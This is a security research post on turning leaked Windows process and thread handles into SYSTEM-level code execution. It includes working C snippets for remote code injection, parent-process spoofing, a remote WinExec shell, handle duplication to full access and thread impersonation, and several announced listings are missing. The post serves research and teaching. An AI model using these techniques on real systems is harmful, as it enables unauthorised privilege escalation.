Over the years I’ve seen and exploited the occasional leaked handle bug. These can be
particularly fun to toy with, as the handles aren’t always granted
THREAD_ALL_ACCESS, requiring a bit more ingenuity.
This post will address the various access rights assignable to handles and what we
can do to exploit them to gain elevated code execution. I’ve chosen to focus
specifically on process and thread handles as these seem to be the most common,
but surely other objects can be exploited in a similar manner.
As background, while this bug can occur under various circumstances, I’ve most
commonly seen it manifest when some privileged process opens a handle with
bInheritHandle set to true. Once this happens, any child process that the
privileged process spawns with handle inheritance enabled inherits the handle
and all access it grants. As an example, assume a SYSTEM level process does this:
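A minimal sketch of what such a call might look like, assuming the service simply opens a full-access handle to itself. The helper name `open_inheritable_self` is hypothetical, and the Windows-only part is guarded so the file still compiles elsewhere:

```c
#ifdef _WIN32
#include <windows.h>

/* Hypothetical helper: open a full-access handle to the current process.
 * Passing TRUE for bInheritHandle is the mistake: the handle is copied into
 * every child that is created with bInheritHandles = TRUE. */
static HANDLE open_inheritable_self(void)
{
    return OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
}
#endif
```

GetHandleInformation can be used to confirm that HANDLE_FLAG_INHERIT is set on the returned handle.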
Since the opened handle is inheritable, any child process will gain access to it. If the privileged process spawns userland code running as the desktop user, as a service often does, those userland processes will have access to that handle.
There are several public bugs we can point to over the years as example and
inspiration. As per usual James Forshaw has a fun one from 2016 in which
he’s able to leak a privileged thread handle out of the secondary logon
service with THREAD_ALL_ACCESS. This is the most “open” of permissions, but
he exploited it in a novel way that I was unaware of at the time.
Another one from Ivan Fratric exploited a leaked process handle with
PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his
Bypassing Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he
identifies the JIT server process mapping memory into the content process. To
do this, the JIT process needs a handle to it. The content process calls
DuplicateHandle on itself with the PROCESS_DUP_HANDLE right, which can be
exploited to obtain a full access handle.
A more recent example is a Dell LPE in which a leaked handle
was obtained from a privileged process. They were able to exploit this via a
dropped DLL and an APC.
In this post, I wanted to examine all possible access rights to determine which were exploitable on their own and which were not. Of those that were not, I tried to determine what concoction of privileges was necessary to make them so. I’ve tried to stay “realistic” here in my experience, but you never know what you’ll find in the wild, and this post reflects that.
For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:
In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.
The client is, of course, a little more involved. The only component that needs
a little discussion up front is fetching the leaked handle. This can be done
via NtQuerySystemInformation and does not require any special privileges:
We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.
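The filtering step can be sketched in isolation. This is only an illustration: `handle_entry` is a simplified, hypothetical mirror of the per-handle record that NtQuerySystemInformation returns for the system handle table, and the object type indexes for processes and threads are passed in by the caller because they differ between Windows builds.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified, hypothetical mirror of one system handle table record. */
typedef struct {
    uint32_t pid;            /* owning process id */
    uint8_t  object_type;    /* object type index (varies by Windows build) */
    uint16_t handle;         /* handle value inside the owning process */
    uint32_t granted_access; /* access mask granted to this handle */
} handle_entry;

/* Copy the entries owned by `pid` whose type index is `type_a` or `type_b`
 * into `out`. Returns how many entries were copied (at most `out_cap`). */
static size_t filter_handles(const handle_entry *all, size_t count,
                             uint32_t pid, uint8_t type_a, uint8_t type_b,
                             handle_entry *out, size_t out_cap)
{
    size_t n = 0;

    assert(out != NULL || out_cap == 0);
    for (size_t i = 0; i < count && n < out_cap; i++) {
        if (all[i].pid != pid)
            continue;   /* not one of ours */
        if (all[i].object_type == type_a || all[i].object_type == type_b)
            out[n++] = all[i];
    }
    return n;
}
```

Each surviving entry carries the granted access mask, which is what decides which of the strategies below applies.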
The remainder of this post will be broken down into process and thread security access rights.
There are approximately 14 process-specific rights. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.
Right off the bat, we’re going to dismiss the following:
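PROCESS_QUERY_INFORMATION
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
PROCESS_SET_QUOTA
PROCESS_VM_OPERATION
PROCESS_VM_READ
SYNCHRONIZE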
To be clear I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.
That leaves the following:
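PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_SET_INFORMATION
PROCESS_VM_WRITE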
We’ll run through each of these individually.
PROCESS_ALL_ACCESS is the most obvious of them all: it grants us access to everything. We can simply allocate memory and create a thread to obtain code execution:
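A minimal sketch of that allocate, write, execute sequence, assuming the payload is position-independent code. The helper name `inject_and_run` is hypothetical, and the Windows-only part is guarded so the file still compiles elsewhere:

```c
#include <stddef.h>

#ifdef _WIN32
#include <windows.h>

/* Hypothetical helper: copy `len` bytes of position-independent code into the
 * target process and start a thread on it. A PROCESS_ALL_ACCESS handle covers
 * every right these three calls need. Returns the new thread handle or NULL. */
static HANDLE inject_and_run(HANDLE hProcess, const void *code, size_t len)
{
    LPVOID remote = VirtualAllocEx(hProcess, NULL, len,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);
    if (remote == NULL)
        return NULL;

    if (!WriteProcessMemory(hProcess, remote, code, len, NULL)) {
        VirtualFreeEx(hProcess, remote, 0, MEM_RELEASE);
        return NULL;
    }

    return CreateRemoteThread(hProcess, NULL, 0,
                              (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL);
}
#endif
```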
Nothing to it.
PROCESS_CREATE_PROCESS is “required to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. The new process inherits its parent’s token, which will hopefully be a SYSTEM token.
Here’s how we do that:
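One way to do this is the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute. The following is a sketch under that assumption; the helper name `spawn_with_parent` is hypothetical, and the Windows-only part is guarded so the file still compiles elsewhere:

```c
#ifdef _WIN32
#include <windows.h>

/* Hypothetical helper: spawn `cmdline` as a child of the process behind
 * `hParent`, which must carry PROCESS_CREATE_PROCESS. */
static BOOL spawn_with_parent(HANDLE hParent, char *cmdline)
{
    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    SIZE_T size = 0;
    BOOL ok = FALSE;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.StartupInfo.cb = sizeof(si);

    /* The first call only reports the required buffer size. */
    InitializeProcThreadAttributeList(NULL, 1, 0, &size);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)
        HeapAlloc(GetProcessHeap(), 0, size);
    if (si.lpAttributeList == NULL)
        return FALSE;

    if (InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {
        /* Name the privileged process as the parent of the new process. */
        if (UpdateProcThreadAttribute(si.lpAttributeList, 0,
                                      PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                      &hParent, sizeof(hParent), NULL, NULL)) {
            ok = CreateProcessA(NULL, cmdline, NULL, NULL, FALSE,
                                EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
                                NULL, NULL, &si.StartupInfo, &pi);
        }
        DeleteProcThreadAttributeList(si.lpAttributeList);
    }
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);

    if (ok) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    return ok;
}
#endif
```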
We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!
With PROCESS_CREATE_THREAD we’ve got the ability to use
CreateRemoteThread, but can’t control any
memory in the target process. There are of course ways we can influence memory
without direct write access, such as WNF, but we’d still have no way of
resolving those addresses. As it turns out, however, we don’t need the control.
CreateRemoteThread can be pointed at a function with a single argument, which
gives us quite a bit of control.
LoadLibraryA and WinExec are both great
candidates for executing child processes or loading arbitrary code.
As an example, there’s an ANSI
cmd.exe string located in msvcrt.dll at offset 0x503b8 (the offset will vary
between builds). We can pass this as an argument to
CreateRemoteThread and trigger a
call to WinExec to pop a shell:
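A sketch of that call, under two assumptions that should be checked on a real target: msvcrt.dll and kernel32.dll are mapped at the same base in our process and the target, and the string offset quoted above matches the installed msvcrt.dll build. The helper name `winexec_remote` is hypothetical, and the Windows-only part is guarded so the file still compiles elsewhere:

```c
#include <stdint.h>

#ifdef _WIN32
#include <windows.h>

/* Offset of the ANSI "cmd.exe" string quoted in the text; build-specific. */
#define CMD_STRING_OFFSET 0x503b8

/* Hypothetical helper: start a remote thread at WinExec whose single
 * argument points at a string that already exists in the target. */
static HANDLE winexec_remote(HANDLE hProcess)
{
    HMODULE msvcrt = LoadLibraryA("msvcrt.dll");
    HMODULE k32 = GetModuleHandleA("kernel32.dll");
    FARPROC winexec;
    LPVOID arg;

    if (msvcrt == NULL || k32 == NULL)
        return NULL;

    winexec = GetProcAddress(k32, "WinExec");
    if (winexec == NULL)
        return NULL;

    /* Assumes the module base is identical in the remote process. */
    arg = (LPVOID)((uintptr_t)msvcrt + CMD_STRING_OFFSET);

    return CreateRemoteThread(hProcess, NULL, 0,
                              (LPTHREAD_START_ROUTINE)winexec, arg, 0, NULL);
}
#endif
```

WinExec takes a second argument (uCmdShow) that a thread start routine never receives, so the window state of the spawned process is whatever happens to be in that register or stack slot.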
We can do something similar for
LoadLibraryA. This of course is predicated on
the system path containing a writable directory for our user.
Microsoft’s own documentation on process security and access rights points to
PROCESS_DUP_HANDLE specifically as a sensitive right. Using it, we can simply
duplicate our process handle with
PROCESS_ALL_ACCESS, allowing us full RW to its address
space. As per Ivan Fratric’s JIT bug, it’s as simple as this:
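A minimal sketch of the upgrade, assuming `hLeaked` carries PROCESS_DUP_HANDLE. The helper name `upgrade_dup_handle` is hypothetical, and the Windows-only part is guarded so the file still compiles elsewhere:

```c
#ifdef _WIN32
#include <windows.h>

/* Hypothetical helper: turn a PROCESS_DUP_HANDLE handle into a full-access
 * handle to the same process. Returns NULL on failure. */
static HANDLE upgrade_dup_handle(HANDLE hLeaked)
{
    HANDLE hFull = NULL;

    /* The source handle is the current-process pseudo handle. It is resolved
     * in the context of the source process (hLeaked), so it refers to the
     * privileged process itself. The duplicate lands in our own process. */
    if (!DuplicateHandle(hLeaked, GetCurrentProcess(),
                         GetCurrentProcess(), &hFull,
                         PROCESS_ALL_ACCESS, FALSE, 0))
        return NULL;

    return hFull;
}
#endif
```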
Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.
PROCESS_SET_INFORMATION allows one to set certain properties of the process,
such as its priority class, in addition to several fields via
NtSetInformationProcess. The latter is far more
powerful, but many of the
PROCESSINFOCLASS fields available are either read
only or require additional privileges to actually set. Process Hacker
maintains an up to date definition of this class
and its members.
Of the available flags, none were particularly interesting on their own. I
needed to add
PROCESS_VM_* privileges in order to make any usable and at
that point we defeat the purpose.
PROCESS_VM_* covers the three flavors of VM access: WRITE/READ/OPERATION. The first two
should be self-explanatory and the third allows one to operate on the virtual
address space itself, such as changing page protections (VirtualProtectEx) or
allocating memory (VirtualAllocEx). I won’t address each permutation of these
three, but I think it’s reasonable to assume that
PROCESS_VM_WRITE is a
necessary requirement. While
PROCESS_VM_OPERATION allows us to crash the
remote process, which could open up other flaws, it’s neither a generic nor an
elegant approach. Ditto with PROCESS_VM_READ.
PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to
come up with a generic solution. At first blush, the entire set of
Shatter-like injection strategies documented by Hexacorn seem like
they’d be perfect. They simply require the remote process to use windows,
clipboard registrations, etc. None of these are guaranteed, but chances are one
is bound to exist. Unfortunately for us, many of them restrict access across
sessions or scaling integrity levels. We can write into the remote process,
but we need some way to gain control over execution flow.
In addition to being unable to modify page permissions, we cannot read nor map/allocate memory. There are plenty of ways we can leak memory from the remote process without directly interfacing with it, however.
Using NtQuerySystemInformation, for example, we can enumerate all threads
inside a remote process regardless of its IL. This grants us a list of
SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other
things, the address of the TEB.
NtQueryInformationProcess allows us to fetch
the remote process PEB address. This latter API requires the
PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major
wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION to
PROCESS_VM_WRITE, which gives us the necessary components to pull this
off. If someone knows of a way to leak the address of a remote process PEB
without it, I’d love to hear.
The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS), this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.
Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed “…on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always set up a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback we can obtain control over execution flow when one of the fiber actions is taken.
With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.
Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well.
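The address arithmetic for the TLS slots can be sketched as follows. The offsets are assumptions taken from the commonly documented TEB layout (TlsSlots at 0x1480 on x64 and 0xE10 on x86, 64 pointer-sized slots) and should be verified against the target build; the function name is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed TEB layout: offset of the inline TlsSlots array. */
#define TEB_TLS_SLOTS_OFFSET_X64 0x1480u
#define TEB_TLS_SLOTS_OFFSET_X86 0x0E10u
#define TLS_SLOT_COUNT           64u

/* Hypothetical helper: remote address of TlsSlots[slot] given a leaked TEB
 * address. Nothing is read from the target, this is pure arithmetic. */
static uint64_t tls_slot_address(uint64_t teb, unsigned slot, int is_64bit)
{
    uint64_t base;
    uint64_t ptr_size;

    assert(slot < TLS_SLOT_COUNT);
    base = teb + (is_64bit ? TEB_TLS_SLOTS_OFFSET_X64
                           : TEB_TLS_SLOTS_OFFSET_X86);
    ptr_size = is_64bit ? 8u : 4u;
    return base + (uint64_t)slot * ptr_size;
}
```

Under these assumptions the array gives 512 contiguous bytes on x64 (256 on x86) at a location we can compute without any read access, at the cost of clobbering whatever the target had stored in those slots.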
Gaining control over the callback was a little trickier. A pointer to a
_FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an
opaque structure. Since we can’t actually read this pointer, we have no simple
way of overwriting the pointer. Or do we?
What I ended up doing is overwriting the FlsCallback pointer itself in the PEB,
essentially creating my own fake
_FLS_CALLBACK_INFO structure in TLS. It’s a
pretty simple structure and really only has one value of importance: the
callback pointer.
In addition, as per the FLS article, we also need to take control over ECX/RCX.
This will allow us to stack pivot and continue executing our ROP payload. This
requires that we update the
TEB->FlsData entry which we also are unable to
do, since it’s a pointer. Much like
FlsCallback, though, I was able to just
overwrite this value and craft my own data structure, which also turned out to
be pretty simple. The TLS buffer ended up looking like this:
There just so happens to be a perfect stack pivot gadget located in
SwitchToFiber (kernel32!SwitchToFiber on Windows 7):
Putting this all together, execution results in:
Now we’ve got EIP and a stack pivot. Instead of marking memory and executing
some other payload, I took a quick and lazy strategy and simply called
LoadLibraryA to load a DLL off disk from an arbitrary location. This works
well, is reliable, and even on process exit will execute and block, depending
on what you do within the DLL. Here’s the final code to achieve all this:
If all works well you should see attempts to load
AAAA.dll off disk when the
callback is executed (just close the process). As a note, we’re using
NtWriteVirtualMemory here because WriteProcessMemory requires
PROCESS_VM_OPERATION, which we may not have.
Another variation of this access might be PROCESS_VM_WRITE | PROCESS_VM_READ.
This gives us visibility into the address space, but we still cannot allocate
or map memory into the remote process. Using the above strategy we can rid
ourselves of the
PROCESS_QUERY_INFORMATION requirement and simply read the
PEB address out of the TEB.
PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we
can now allocate memory and change page permissions. This allows us to more
easily use the above strategy, but also perform inline and IAT hooks.
As with the process handles, there are a handful of access rights we can dismiss immediately:
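SYNCHRONIZE
THREAD_GET_CONTEXT
THREAD_QUERY_INFORMATION
THREAD_QUERY_LIMITED_INFORMATION
THREAD_SUSPEND_RESUME
THREAD_TERMINATE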
Which leaves the following:
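THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_IMPERSONATE
THREAD_SET_CONTEXT
THREAD_SET_INFORMATION
THREAD_SET_LIMITED_INFORMATION
THREAD_SET_THREAD_TOKEN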
There’s quite a lot we can do with THREAD_ALL_ACCESS, including everything
described in the following thread access rights sections. I personally find the
THREAD_DIRECT_IMPERSONATION strategy to be the easiest.
There is another option that is a bit more arcane, but equally viable. Note
that this thread access doesn’t give us VM read/write privileges, so there’s
no easy way to “write” into a thread, since that doesn’t really make sense.
What we do have, however, is a pair of APIs that sort of grant us that:
SetThreadContext and GetThreadContext. About a decade ago a code
injection technique dubbed Ghostwriting was released to little fanfare. In
it, the author describes a code injection strategy that does not require the
typical win32 API calls; there’s no WriteProcessMemory or NtMapViewOfSection,
for instance.
While the write-up is lacking in a few departments, it’s quite a clever bit of
code. In short, the author abuses the SetThreadContext/GetThreadContext
calls in tandem with a set of specific assembly gadgets to write a payload,
dword by dword, onto the thread’s stack. Once written, they use
NtProtectVirtualMemory to mark the code RWX and redirect code flow to it.
For their write gadget, they hunt for a pattern inside NTDLL of the form
MOV [REG1], REG2 followed by a RET.
They then locate a
JMP $, or jump here, which will operate as an auto lock
and infinitely loop. Once we’ve found our two gadgets, we suspend the thread.
We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP
so the return address is the
JMP $, and set REG2 to the jump gadget. Here’s
my write function:
The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the
appropriate registers. Once those are set, we set our stack base (adjusted from
the thread’s RSP) and update RIP to our gadget. The first time we execute this
we’ll write our JMP $ gadget to the stack.
They use what they call a thread auto lock to control execution flow (edits mine):
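A rough x64 approximation of such a loop, as a sketch rather than the Ghostwriting author’s code. The helper name `wait_for_sink`, the time slice, and the round limit are all hypothetical; the handle needs THREAD_SUSPEND_RESUME and THREAD_GET_CONTEXT, and the block is guarded so the file still compiles elsewhere:

```c
#ifdef _WIN64
#include <windows.h>

/* Hypothetical helper: let a suspended thread run in short slices until its
 * instruction pointer sits on the JMP $ "sink" gadget. The thread must be
 * suspended on entry and is left suspended on return. Returns TRUE once the
 * sink is reached, FALSE on error or after `maxRounds` slices. */
static BOOL wait_for_sink(HANDLE hThread, DWORD64 sinkAddress,
                          DWORD sliceMs, unsigned maxRounds)
{
    CONTEXT ctx;
    unsigned i;

    for (i = 0; i < maxRounds; i++) {
        if (ResumeThread(hThread) == (DWORD)-1)
            return FALSE;
        Sleep(sliceMs);                      /* let it execute a little */
        if (SuspendThread(hThread) == (DWORD)-1)
            return FALSE;

        ZeroMemory(&ctx, sizeof(ctx));
        ctx.ContextFlags = CONTEXT_CONTROL;  /* we only need RIP/RSP */
        if (!GetThreadContext(hThread, &ctx))
            return FALSE;
        if (ctx.Rip == sinkAddress)
            return TRUE;                     /* parked on the sink gadget */
    }
    return FALSE;
}
#endif
```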
It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the “sink” gadget has been reached.
Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.
I ported the core function of this technique to x64 to demonstrate its
viability. Instead of using it to execute an entire payload, I simply execute
LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is
available on Github. Turning it into something production ready is left as
an exercise for the reader ;)
Additionally, while attending Blackhat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve released a code injection tool that contains an x64 implementation of GhostWriting. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.
THREAD_DIRECT_IMPERSONATION differs from
THREAD_IMPERSONATE in that it allows the thread token to be
impersonated, not simply TO impersonate. Exploiting this is simply a matter of
using the NtImpersonateThread API, as pointed out by James Forshaw.
Using this we’re able to create a thread totally under our control and
impersonate the privileged one:
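A minimal sketch of that call. NtImpersonateThread is resolved from ntdll at runtime; the prototype below is the commonly published one and is an assumption as far as official headers go, the helper name `impersonate_leaked_thread` is hypothetical, and the Windows-only part is guarded so the file still compiles elsewhere:

```c
#ifdef _WIN32
#include <windows.h>

/* Assumed prototype: the first thread impersonates the second. */
typedef LONG (NTAPI *NtImpersonateThread_t)(HANDLE ServerThread,
                                            HANDLE ClientThread,
                                            PSECURITY_QUALITY_OF_SERVICE Qos);

/* Hypothetical helper: make hNewThread (a thread we own) impersonate the
 * security context of hLeakedThread, which must carry
 * THREAD_DIRECT_IMPERSONATION. */
static BOOL impersonate_leaked_thread(HANDLE hNewThread, HANDLE hLeakedThread)
{
    SECURITY_QUALITY_OF_SERVICE qos;
    NtImpersonateThread_t fn;
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");

    if (ntdll == NULL)
        return FALSE;
    fn = (NtImpersonateThread_t)GetProcAddress(ntdll, "NtImpersonateThread");
    if (fn == NULL)
        return FALSE;

    qos.Length = sizeof(qos);
    qos.ImpersonationLevel = SecurityImpersonation;
    qos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
    qos.EffectiveOnly = FALSE;

    /* NTSTATUS success codes are non-negative. */
    return fn(hNewThread, hLeakedThread, &qos) >= 0;
}
#endif
```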
hNewThread will now be executing with a SYSTEM token, allowing us to do
whatever we need under the privileged impersonation context.
Unfortunately I was unable to identify a surefire, generic method for exploiting THREAD_IMPERSONATE. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.
We can use this to force the privileged thread to impersonate us, using the
NtImpersonateThread call, which may unlock additional logic bugs in the
application. For example, if the service were to create shared resources under
a user context for which it would typically be SYSTEM, such as a file, we can
gain ownership over that file. If multiple privileged threads access it for
information (such as configuration) it could lead to code execution.
While THREAD_SET_CONTEXT grants us access to
SetThreadContext, it also conveniently
allows us to use
QueueUserAPC. This is effectively granting us a
CreateRemoteThread primitive with a caveat. For an APC to be processed by the
thread, it needs to enter an alertable state. This happens when a specific set
of win32 functions are executed, so it is entirely possible that the thread
never becomes alertable.
If we’re working with an uncooperative thread,
SetThreadContext comes in
handy. Using it, we can force the thread to become alertable via the
NtTestAlert function. Of course, we have no ability to call
GetThreadContext and will therefore likely lose control of the thread
afterwards.
In combination with
THREAD_GET_CONTEXT, this right would allow us to
replicate the Ghostwriting code injection technique discussed in the
THREAD_ALL_ACCESS section above.
THREAD_SET_INFORMATION is needed to set various ThreadInformationClass values
on a thread, usually via
NtSetInformationThread. After looking through all of these, I did not
identify any immediate ways in which we could influence the remote thread. Some
of the values are interesting but unusable (ThreadAttachContainer, etc.) and
are either not implemented/removed or require
SeDebugPrivilege or similar.
I’m not really sure what would make this a viable candidate either. There’s really not a lot of juicy stuff that can be done via the available functions.
THREAD_SET_LIMITED_INFORMATION allows the caller to set a subset of thread
information classes, such as ThreadNameInformation. None of these get us
anywhere near an exploitable primitive.
As with THREAD_IMPERSONATE, I was unable to find a direct and generic
method of abusing THREAD_SET_THREAD_TOKEN. I can set the thread’s token or
modify a few of its fields (via SetTokenInformation), but this doesn’t grant us much.
I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT
Missing these will require a deeper understanding of your target and some creativity.
Similarly, processes have a specific subset of rights that are directly exploitable:
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE
Barring these, more creativity is required.
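As a quick triage aid, the conclusions of this post can be folded into a pair of checks on a handle’s granted access mask. This is only my reading of the sections above, not a definitive rule: the function names are hypothetical, and PROCESS_VM_WRITE is treated as needing PROCESS_QUERY_INFORMATION, as in the FLS walk-through. The constants are the documented winnt.h values, defined here only when windows.h is unavailable.

```c
#include <stdbool.h>
#include <stdint.h>

#ifdef _WIN32
#include <windows.h>
#else
#define PROCESS_CREATE_THREAD       0x0002
#define PROCESS_VM_WRITE            0x0020
#define PROCESS_DUP_HANDLE          0x0040
#define PROCESS_CREATE_PROCESS      0x0080
#define PROCESS_QUERY_INFORMATION   0x0400
#define THREAD_SET_CONTEXT          0x0010
#define THREAD_DIRECT_IMPERSONATION 0x0200
#endif

/* True if a leaked process handle with this mask fits one of the generic
 * strategies described above. ALL_ACCESS contains every bit checked here. */
static bool process_mask_exploitable(uint32_t mask)
{
    const uint32_t write_and_query =
        PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION;

    if (mask & (PROCESS_CREATE_PROCESS | PROCESS_CREATE_THREAD |
                PROCESS_DUP_HANDLE))
        return true;

    /* The FLS approach needed the PEB address, hence QUERY_INFORMATION. */
    return (mask & write_and_query) == write_and_query;
}

/* True if a leaked thread handle with this mask fits one of the generic
 * strategies described above. */
static bool thread_mask_exploitable(uint32_t mask)
{
    return (mask & (THREAD_DIRECT_IMPERSONATION | THREAD_SET_CONTEXT)) != 0;
}
```

A false result does not mean a handle is safe, only that none of the generic approaches covered here applies without further creativity.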